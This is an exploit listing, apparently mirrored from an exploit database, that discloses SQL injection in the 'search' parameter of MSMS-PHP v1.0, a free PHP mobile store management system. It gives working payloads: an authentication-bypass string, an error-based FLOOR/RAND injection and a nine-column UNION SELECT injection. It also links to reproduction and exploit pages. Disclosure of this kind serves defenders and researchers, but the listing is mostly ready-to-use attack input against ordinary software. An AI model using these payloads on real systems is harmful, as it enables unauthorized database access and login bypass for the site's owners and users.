Share
## https://sploitus.com/exploit?id=PACKETSTORM:177557
## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 03/13/2024  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.  
There is a change in response when nu11secur1ty' or 1=1# is injected.  
Potential SQLi detected. Please confirm it manually after you check  
the POST, GET, or other requests... The payload from the  
puncher_SQLi_bypass_authentication module was submitted successfully  
after the test. The `search` parameter is vulnerable for Multiple SQLi  
attacks. The attacker can get all information from the system by using  
this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: search (GET)  
Type: error-based  
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)  
Payload: p=products&search=-9068') OR 1 GROUP BY  
CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0  
END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 9 columns  
Payload: p=products&search=-7515') UNION ALL SELECT  
2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)  
  
## Time spend:  
00:15:00